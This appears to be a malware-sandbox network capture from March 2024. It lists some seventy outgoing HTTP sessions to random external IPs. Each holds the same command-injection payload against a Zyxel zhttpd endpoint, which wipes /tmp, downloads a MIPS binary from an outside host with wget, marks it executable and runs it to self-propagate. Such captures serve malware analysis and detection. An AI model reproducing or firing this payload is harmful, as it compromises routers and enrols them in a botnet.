                                        Mar 31, 2024 09:20:32.246923923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1042192.168.2.2356978166.233.244.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.246973038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1043192.168.2.2355936204.191.63.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247025967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1044192.168.2.23543009.222.172.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247056961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1045192.168.2.233986031.179.220.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247095108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1046192.168.2.2357678193.220.28.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247149944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1047192.168.2.2340948119.112.194.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247184992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1048192.168.2.234630467.11.145.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247248888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1049192.168.2.2352286196.162.23.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247278929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1050192.168.2.234373623.160.158.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247311115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1051192.168.2.2335626181.114.137.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247361898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1052192.168.2.23536609.31.166.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247397900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1053192.168.2.234278023.224.180.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247440100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1054192.168.2.234934678.116.224.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247488976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1055192.168.2.2359994124.142.241.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247535944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1056192.168.2.2339736136.77.24.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247580051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1057192.168.2.233344874.254.202.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247637987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1058192.168.2.2348782223.75.91.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247684002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1059192.168.2.2333148186.221.173.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247734070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1060192.168.2.2338932186.124.142.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247775078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1061192.168.2.234182088.182.46.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247833967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1062192.168.2.2350242146.24.166.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247884035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1063192.168.2.2355550194.59.177.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247934103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1064192.168.2.235570296.66.93.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.247966051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1065192.168.2.2349354173.79.148.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248012066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1066192.168.2.2345446194.150.189.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248050928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1067192.168.2.2353478102.188.153.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248086929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1068192.168.2.236054042.184.235.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248126030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1069192.168.2.233908446.12.92.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248176098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1070192.168.2.234824667.227.129.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248220921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1071192.168.2.2346374197.171.204.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248265982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1072192.168.2.235324662.221.155.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248321056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1073192.168.2.233594035.171.179.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248353958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1074192.168.2.2345302135.252.79.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248418093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1075192.168.2.2354146103.132.180.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248452902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1076192.168.2.2347692160.176.89.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248490095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1077192.168.2.2359976168.215.246.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248528957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1078192.168.2.2333878222.92.115.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248563051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1079192.168.2.2344628210.13.203.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248601913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1080192.168.2.235677684.124.48.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248651981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1081192.168.2.2360706151.240.215.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248697996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1082192.168.2.2353614221.26.191.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248744011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1083192.168.2.235953834.56.232.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248764038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1084192.168.2.2342684101.97.137.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248806000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1085192.168.2.2360162180.81.100.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248852015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1086192.168.2.233725882.44.251.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248914957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1087192.168.2.2354400208.141.0.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248941898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1088192.168.2.233765632.82.152.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.248989105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1089192.168.2.2348366196.112.117.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249031067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1090192.168.2.233730289.205.28.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249073982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1091192.168.2.2340804158.124.32.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249116898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1092192.168.2.2353040222.11.244.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249157906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1093192.168.2.2338760190.121.129.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249187946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1094192.168.2.2346684117.42.249.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249264956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1095192.168.2.23367244.66.189.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249301910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1096192.168.2.234270242.9.144.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249324083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1097192.168.2.2339348161.8.119.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249387980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1098192.168.2.2358664125.231.143.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249412060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1099192.168.2.235920051.62.1.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249454021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1100192.168.2.2334608169.187.145.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249522924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1101192.168.2.236088227.233.159.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249563932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1102192.168.2.235915277.245.164.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249613047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1103192.168.2.2356746157.185.147.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249646902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1104192.168.2.234703212.131.185.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249703884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1105192.168.2.234584045.180.3.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249733925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1106192.168.2.233646272.136.95.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249780893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1107192.168.2.2341518148.178.24.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249813080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1108192.168.2.2347980190.31.50.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.249864101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1109192.168.2.2335356162.88.78.220443
                                        TimestampBytes transferredDirectionData
